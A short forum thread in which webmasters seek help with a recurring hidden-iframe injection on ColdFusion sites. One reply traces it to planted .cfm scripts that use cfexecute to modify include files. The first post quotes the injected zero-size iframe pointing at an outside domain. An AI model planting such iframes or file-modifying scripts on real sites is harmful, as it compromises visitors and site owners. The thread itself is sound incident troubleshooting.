Member Avatar for bennyboy1989

Hi I really need some help!

Recently one of my sites have been hit with an iframe injection:

<iframe scrolling="no" frameborder="0" src="the source changes but normally htttp://collegefun4u.com/" width="0" height="1"></iframe>

It happens at random times and gets inserted in random include files.

We have clean scanned all computers + server for viruses, changed all ftp/remote desktop passwords but the problem still occurs.

I don't think that it's an SQL injection attack because it is not hitting the database and only being injected into include files.

Some advice would really be appreciated as I have tried extensivley to get rid of it with no avail!

I am currently using CF9 runnning on a Windows 2003 server.

Thanks Alot!

  • 3 Contributors
  • 3 Replies
  • 259 Views
  • 1 Month Discussion Span
  • Latest Post Latest Post by samh90
Member Avatar for samh90

Hi, Have you had any joy getting this resolved? We run a Coldfusion server with several sites and have recently started experiencing the same problems. The hidden iFrame is exactly the same as yours.

Member Avatar for samh90

After some more digging, I found 2 malicious Coldfusion scripts in our 'Default Site' directory. (we use ISS on windows). One of the files was named something along the lines of '0188568_google.cfm', and was scripted to use cfexecute to run another script from the command line to modify a file passed in as a param. We have deleted the malicious files and changed all passwords/blocked access to our default site so hopefully this will not re-occur.

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.